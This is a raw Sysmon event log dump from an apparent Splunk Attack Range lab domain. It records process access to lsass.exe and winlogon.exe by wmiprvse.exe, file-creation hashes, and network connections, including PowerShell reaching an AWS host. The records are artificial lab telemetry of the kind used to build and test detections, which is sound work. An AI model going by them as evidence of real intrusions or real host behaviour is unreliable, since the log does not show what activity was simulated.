21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151846Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151845Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151844Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151843Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151842Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151841Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151840Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.237{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=679AFE5E8D643C098E8922C04648DBD6,SHA256=5F44F6E0A51592A446D7FDE2136C2B97E55CF52E8C9A0539B2722F6E6ED4A210,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105198Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:43.206{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=786EAE228937F54142D46B5043854C84,SHA256=A9C09651303B8C6E359161350D50C71280B7782AB9C1B2AD8094603F8BF429D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151981Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:43.619{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43A868BD57EE8913F2C86B31B2A16F22,SHA256=61861BD6D0B4690D14ACE57F45FA2CB7499BBFD661B8473687BECE0A510D3029,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151980Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:43.399{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1FC7193481524DABA78193BC305116A1,SHA256=1CDF50FDD65E3D785AF559C068E94F42FB5CD09F8A09CB524E3C23E4C13409AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151979Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:43.367{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C1BC07E5FD8A18F8F289EDA395661EA4,SHA256=AA70BC0CB8036F67BD83D1671016762B24DCF1085A7E5030F5EA82BF867967D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151978Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:43.367{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=CBF67D2AD4D8339926B6765FF7D4FDFF,SHA256=18BA55D4C5E14B2528EFAA3F395781582CC9867D21D1A49C33C1D1BDC5156BA7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151977Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:41.057{39BD8DE3-2672-60CA-E003-00000000D101}5836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58424-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x8000000000000000105199Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:44.575{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5CFF8F30C3DFA58140B59196576AE6B,SHA256=53FCB36439EC54566C954AF34E915137926E4F3DA954D351913A0DE04974CFF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151982Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:44.636{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBCBD4563272FC7726B1C72D1FCF4B0C,SHA256=C73087BAE7E81E69A87845AD6E7E292C39330E20DC5872E81873CD9663E9C13A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105200Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:45.940{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5471D4CE0FCC7C83F22911D3DA14B71F,SHA256=E54C3DC165224B6C5CEADBFA2E8659E521765E7BBFC0EEFC7265EE0F932DFBCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151990Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:45.851{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=143285372B79EDB0CF70E11D55FEFC4D,SHA256=D72E3C79471A919129402A63F060E48D324BA5A26406DF7B50E08C610FE7D02E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151989Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:45.851{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=B72DEC2FB93BC91BF855883F162CC8E6,SHA256=97E72E1EA366000E99B8DF64E91E4178DEE61D2C0CD74E3605474EE7DE15D5CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151988Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:45.851{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=143ECA4C878EC9C2C2E5785C9BF0B1BD,SHA256=A9C363A16860E1201D97827473C2CD7E746E7884B38EC945EFE7C5E3F188D457,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151987Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:45.851{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=68284AC2482D96C54A38DFB28E319369,SHA256=2ED289BC03AFA326439AE4CED85372C2068548B48F46516F2C6496C297408FC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151986Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:45.851{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=CAEE6D574181BCDF3F16EA977950CF20,SHA256=FB890A96E9364BAD78D8453A08C6BE8AC1B3D2DE74971D7316A72CE07BF284F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151985Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:45.851{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=6CA9584EAB4E88483047A8905118A59A,SHA256=B9D2CE552CF8213447EDF66B1E029C63B430728824A884126DFCA7D8D9F65F3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151984Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:45.651{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8F82521EF6568E79A77E9D5ABB47457,SHA256=A2A85FB893D83F7F901C0893DD3B924BA78EA7E85524A3FDEB96A01A84F9CEA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151983Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:45.251{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=42100245999C8F7906BBA7AEF9AD1043,SHA256=909C17AE0DBBE6EE89F6F127FE6721E763D51F6CF6717D2E7F27BE9D2A44D3BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151992Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:46.697{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B98D638DB5C733A82F3BD78C607A398C,SHA256=1A3D57514D30C25C975E72AE1AB6AEA9E1BFACD44020C817A1542A6F53E05933,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151991Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:44.019{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58425-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000105201Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:47.291{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37C26BF54453C369BB1E442F2768EEB9,SHA256=DA0C7D38BBA59B1C7671CE0B2EE8595504D9015B5DD9FED2E67824BFEADF616A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151993Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:47.714{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6F094B3F69A3F6AC830F95048D8E7DA,SHA256=9FCA05ED5666559B68C424AE9BF77755A3D57B9B0FFD9C123023EA31BD7EA197,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105203Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:48.651{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71179638A70481D4630BB930B69EAEFE,SHA256=6E479D56CE710FB9F67B5F9FA8D4117B85E347C05D5F49C0C29C990116129CCB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105202Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:45.854{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55444-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151994Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:48.734{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=340ED0BC44EB2E492866CC6F6FAFABBC,SHA256=44FBDC4D5682D68C419D30792FFD923E3E2CEE782448335378E0C80DDA45C39D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151995Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:49.750{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E182E0114096AB77472B5BC031F6679,SHA256=F3033C350F10927DC6361AC67DE34E73B6A1C595E9DEB3377ED07F7EDD9A655A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105205Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:50.016{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=163C78BBB84BC1482471952DAB193623,SHA256=54DD1CA2C3DF919266C8E531DB77CE69A6CDD7CDBEEFA2A313E0631D87F80057,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105204Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:50.014{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CFD8A0D0D5C925EEB23B6CBF0E56A1B,SHA256=5FA5D3342A1683A748C6645E0E7065B13A39DCEF4BCAE5F1C92ED67E8A5C5B1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151996Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:50.750{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B25B89DBB086F0867962E67D80EBC08,SHA256=7F5BE6D55C4FB9827EA3376FD63AAB7A7FB1EB051369B4FA09322280A7AC86E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105206Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:51.380{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82DE5AA822D1035C30CB55483D85FD60,SHA256=55872E3F741FD5B28F153C63D1F32368540B64770BEC79A2AF65D1863045600E,IMPHASH=00000000000000000000000000000000falsetrue 